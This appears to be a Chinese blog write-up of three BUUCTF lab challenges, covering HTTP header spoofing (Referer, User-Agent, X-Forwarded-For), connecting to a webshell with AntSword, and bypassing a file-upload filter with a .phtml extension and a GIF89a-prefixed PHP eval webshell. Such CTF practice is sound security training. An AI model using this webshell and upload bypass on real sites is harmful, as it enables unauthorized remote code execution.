buuctf(二)

[极客大挑战 2019]Http1

在这里插入图片描述
老规矩,查看源代码

1
2
3
4
5
6
7
8
9
10
11

<!-- Two -->
<section id="two" class="wrapper alt style2">
<section class="spotlight">
<div class="image"><img src="images/pic01.jpg" alt="" /></div><div class="content">
<h2>小组简介</h2>
<p>·成立时间:2005年3月<br /><br />
·研究领域:渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术<br /><br />
·小组的愿望:致力于成为国内实力强劲和拥有广泛影响力的安全研究团队,为广大的在校同学营造一个良好的信息安全技术<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>!</p>
</div>
</section>

发现有一个隐藏的网页secret.php,点击
在这里插入图片描述

注:
1、HTTP Referer是header的一部分,当浏览器发送请求的时候带上Referer,告诉服务器该网页是从哪个页面链接过来的。
2、User Agent,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

紧接着使用burp抓包
在这里插入图片描述
提示浏览器不对,一般访问浏览器的名字都会被设置在UA参数中。如
在这里插入图片描述
将其改成
在这里插入图片描述
还要调整X-Forwarded-For: 127.0.0.1,然后成功拿到flag
在这里插入图片描述

[极客大挑战 2019]Knife1

启动靶机
在这里插入图片描述
打开后发现有一个一句话木马,尝试用蚁剑连接一下
在这里插入图片描述
连接成功,发现flag在文件夹/下

[极客大挑战 2019]Upload1

本题为文件上传,先上传一个php文件
在这里插入图片描述
意料之内,然后使用burp抓包,修改Content-Type为image/jpeg,然后

在这里插入图片描述
开来不能php文件被拉入黑名单了,使用不常见的文件后缀名phtml绕过
在这里插入图片描述
看来<?被过滤掉了,我们换

1
GIF89a? <script language="php">eval($_REQUEST[feng])</script>

上传成功,蚁剑连接
在这里插入图片描述
本题得解